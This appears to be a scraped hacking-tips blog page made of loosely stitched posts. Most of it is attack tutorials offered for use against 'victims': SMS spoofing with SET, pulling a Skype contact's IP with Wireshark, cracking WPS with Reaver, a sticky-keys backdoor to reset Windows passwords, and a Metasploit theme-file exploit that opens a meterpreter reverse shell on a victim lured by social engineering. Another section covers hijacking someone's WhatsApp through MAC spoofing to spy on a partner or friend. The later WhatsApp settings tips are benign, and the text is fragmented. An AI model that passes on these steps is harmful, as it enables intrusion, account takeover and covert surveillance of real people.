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Privacy on Facebook is a big issue Facebook users are concerned about, Facebook even provided the profile display picture locking facility in the past to


This whatsapp trick is tweaky, you can use whatsapp without number that means not with your own number.


Step 1 : Open set Tool in Backtrack 5 : To open it follow the step shown above.......


Distributed denial-of-service (DDoS) attacks are always in top headlines worldwide, as they are plaguing websites in banks, and virtually of almost every organization having a prominent online presence.

31 Jan 2015

SMS spoofing using kali linux

SMS spoofing

Short message service (SMS) is now available on mobile phones, I, You and everyone using SMS for the communication. SMS spoofing means to set who the message appears to come from by replacing the originating mobile number (Sender ID) with alphanumeric text/ another number. (Wikipedia).
I will discuss most of the theorical aspect here like how to perform SMS spoofing? How SMS spoofing work? And so many question.

Social engineering toolkit contain a SMS spoofing attack vector that can used to perform SMS spoofing. Requirement for tutorial:
  • Operating system (Backtrack 5 for this tutorial)
  • SET (Social engineering toolkit)
  • A Brain (important)
So I will use backtrack 5 to perform SMS spoofing however you can use Ubuntu, Gnacktrack, Backbox and other Linux or other OS.
  • On the SET menu select number 7 that is SMS spoofing attack vector.
  • On the second step “1. Perform a SMS Spoofing Attack”
  • On the third choose what you want to do a Mass SMS spoofing or a single in this case I select 1.
  • On the fourth you need to enter the number of the receiver, make sure to enter with country code.
  • On the next step 1. Pre-Defined Template
  • On this step you need to choose the templates (choose what you want)
  • If you have a android emulator that wonderful but you can use some paid services. So its up to you select and than send your message.

- See more at: http://www.ehacking.net/2011/10/sms-spoofing-tutorial-set-backtrack-5.html#sthash.jiIfcTjO.dpuf

how to get friend IP adress from Skype

 how to get someone's IP adress from Skype.

You will need: - Wireshark

In this tutorial i will using Kali Linux.

1. Go to Options --> Advanced and see which port your skype is using (my is 27048)

 how to get someone's IP adress from Skype.

2. Call your victim.
3. Open Wireshark, you can open it by: root@laceratus:~#wireshark
                                                             Programms - Kali Linux - Top 10 Security Tools - Wireshark
4. Choose your interface for Capure (my is eth0)
5. Click on Start
6. Find port for skype (my is 27048)

 how to get someone's IP adress from Skype.

hack wifi wpa/wpa2 with kali linux

Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases, as described in http://adf.ly/Q210f

Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.

On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase



step 1:Start your computer and enter into Bios Setup. Change your boot preferences to boot from CD /DVD.
Step 2:Insert your windows Bootable CD and select the “Repair your computer” option from the lower left-hand corner.
Step 3:Then click on command prompt option.
Step 4:First you should type the following command to backup the original sticky keys file:

copy c:windowssystem32sethc.exe c:

Step 5:Then you’ll copy the command prompt executable (cmd.exe) over top of the sticky keys executable

copy c:windowssystem32cmd.exe c:windowssystem32sethc.exe
Now you can reboot the PC.

Resetting the Password

Once you get to the login screen, hit the Shift key 5 times, and you’ll see an administrator mode command prompt.
Now to reset the password—just type the following command, replacing the username and password with the combination you want:

Syntax : net user account.name *
Example: net user raaz *
and hit enter. Set any password for that account
.ITS done Buddy you have successfully cracked window 7 security… Now you can login… Enjoy

30 Jan 2015

how to hack windows pc using kali linux


So today we will look how an attacker can hack into windows xp system using a Arbitrary code execution vulnerability.We are going to use metasploit that is present on kali Linux or you can do the same with backtrack also. Technical description of the vulnerability is there exist a vulnerability on Microsoft Windows XP and Windows 2003 Operating system on handling of the Screen Saver path, in the [boot] section. An arbitrary path can be used as screen saver, including a remote SMB resource, which allows for remote code execution when a malicious .theme file is opened, and the “Screen Saver” tab is viewed.
Lets carryout the attack Practically here i have used victim machine to windows sp3 and attack to be kali Linux.
so follow it step by step
  • open terminal in kali Linux and type msfconsole.
  • Now type down following commands one by one
  • use exploit/windows/fileformat/ms13_071_theme
  • msf exploit (ms13_071_theme)>set payload windows/meterpreter/reverse_tcp
  • msf exploit (ms13_071_theme)>set lhost 
    (IP of your Kali machine to know type ifconfig on new terminal)
  • msf exploit (ms13_071_theme)>set srvhost
  • msf exploit (ms13_071_theme)>exploit
once all this done you need to give to your victim\\ via chat or email or any social engineering technique you can use.once the victim open the url provided by you he will asked for confirmation of opening link .
as soon as victim click run you will have your meterpreter shell open .
send link
Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

29 Jan 2015

hack a pc using kali linux

hacking a pc using kali linux:

27 Jan 2015

WhatsApp Spy Your Friend's Account

Most Wanted among Tricks WhatsApp : Well, most of you want to spy on your friend / lover ' s WhatsApp to know who else has chat , what kind of talk they do, etc. So here is the trick.

WhatsApp Spy Your Friend's Account

Install Spymaster PRO  that will provide the ability to track and read the entire conversation of their teenagers and Cheating Spouse track shared pictures / video with time - timestamp too.alternative
The above application is very powerful, but you'll pay for it. So better be a free alternative that is here.
What we are about to do ? Well, WhatsApp check the MAC address of a phone. If you try to change it, WhatsApp will ask you to confirm your phone number . So , we have a loop hole . If you will be able to change the MAC address of your phone to the MAC address of the victim , you can access his / WhatsApp account from your phone .

Follow These Steps:

1. Install Buysbox  ( for rooted device ) or not Rooted BusyBox  - (for the phone without root)
 3.Head up Tip # 5 and meet multiple account and install WhatsApp on your Android   
4. Get your victim for 10 minutes and seek his / her MAC address: the location is For Android Settings >> About phone >> State >> Wi -Fi MAC address for iPhone (Settings >> General >> About Wi -Fi >> addresses ) for Windows Phone (Settings >> About >> More Info >> MAC Address ) and BlackBerry (Options >> Device >> Device and Status info >> WLAN MAC ) 
 5.Follow this Llink  to learn how to spoof the MAC address.
6. Enter the phone number of the victim's WhatsApp, check it by entering the verification code received on the cell phone of the victim.
 7.  That's it. Now you can spy the victim completely WhatsApp ID .

using fake number on whats app

In our previous post we told you how to use Whats Apps on windows . In this post we tell you how to use fake number in Blue Stacks Android using Whats Apps .

Install whats App on Blue Stacks
using fake number on whats app

now !! it will prompt you for your number :p here you apply the tricks using a fake number.
using fake number on whats app

For fake number we use Pinger provides free text service on web and gives you a number . you can also use any other text free service . 
signup here and get a fake number from pinger 
using fake number on whats app

whatsApp send a verification code on fake number you provided . check your pinger inbox and when you got a code enter it here and volla :p you are ready to use whats app using fake number. 
using fake number on whats app

using fake number on whats app

enjoy and share virus volt :p


Change Whatsapp Number Without Losing Messages

The most traditional way that most users do WhatsApp to change your number you uninstall and reinstall WhatsApp with the new number. If you do the same , all previous messages are lost.

So instead of using this form , change your number, scroll to Settings >> Account >> Change Number . Here , enter your old and new number and press ' Done' . WhatsApp will send a number and they will get checked .
Their conversations will be kept intact .

WhatsApp Tricks Theme Change

Bored of the same theme WhatsApp ? Yes you can change the wallpaper , status , profile picture, but the issue remains the same. So , if you want a completely new interface for your then install WhatsApp WhatsApp PLUS Holo  .WhatsApp Provides default theme " HOLO " but there are plenty of other ways to customize your interface WhatsApp.Other topics are also provided .

WhatsApp Tricks Theme Change

WhatsApp Hide Your Profile Image

Due to privacy concerns , or anything else , if you want to hide your profile picture WhatsApp and do not want to put any pic then WhatsApp Plus  screen help you.There are many fakes available for WhatsApp Plus online to make sure you download this application from a trusted source.

WhatsApp Hide Your Profile Image

Once installed , this application allows you to hide your profile WhatsApp images from other friends. And therefore , you can make an anonymous chat .

Whatsapp Change Your Friend's Profile Picture

You can not really change WhatsApp photo of a friend from your phone in the world , but can be changed to your phone so that every time someone goes to check on his WhatsApp , he / she will see your photo profile assigned to that friend. Therefore, it would be a great way to tease your friends.

Whatsapp Change Your Friend's Profile Picture

To Do This, Follow These Steps :  

1.  Download Image weird-looking/funny to allocate to your friend 's profile pic WhatsApp .
2.Change the size of 561 x 561 pixels and the name of the cell phone number of your friend using WhatsApp .
3. Save the image to the SD >> card WhatsApp >> Profile Pictures . Overwrite the existing file (if necessary ) .
 4. Now, you show your friend the pic your profile WhatsApp instant panic invite her face.

Note - Disable WiFi / data connection to WhatsApp not automatically update the pic .

WhatsApp Hide Last Seen For The WhatsApp

Timestamp Last seen gives us an idea about when the person you want to chat was online. It's a great feature, but the function becomes really annoying because it reveals whether you are online , and no. You can not hide from your friends and they'll keep talking to you.

WhatsApp Hide Last Seen For The WhatsApp

So if you want to hide this " last seen in the" time stamp account then download WhatsApp application will not last seen. After installation , select the option to hide their " Last seen in the  ' time stamp . NO ROOT REQUIRED .

use whats app on PC/Laptop

BlueStacks Anroid Emulator

if you'r Android  Apps lover and you want to use Apps on your PC/Laptop , and  you don't have android Phone don't worry , In this post we we tell you about Blue Stacks Android Emulator.

Blue Stacks App Player lets you run your favorite mobile
apps fast and fullscreen in your browser and on PC.

installation take 25-30 minutes and you get all Android Google play store apps on your desktop

you can also use Whats App Facebook skype and my others with dual accounts :p
check post how to use whats App on bluestacks without your contact number :p
enjoy and share :p 

Turn Off Automatic Image Download WhatsApp

While before, plus WhatsApp application was needed to stop the automatic download of pictures, videos and audio files, but now, WhatsApp has added this option to your configuration. Thus, you can control the file download automatic means.

Turn Off Automatic Image Download WhatsApp

 Simply go to Settings -Chat Settings -> Technical self-discharge -> Check appropriate option "By using mobile data ','When connected 'Wi-Fi' and 'roaming'. 

That's it.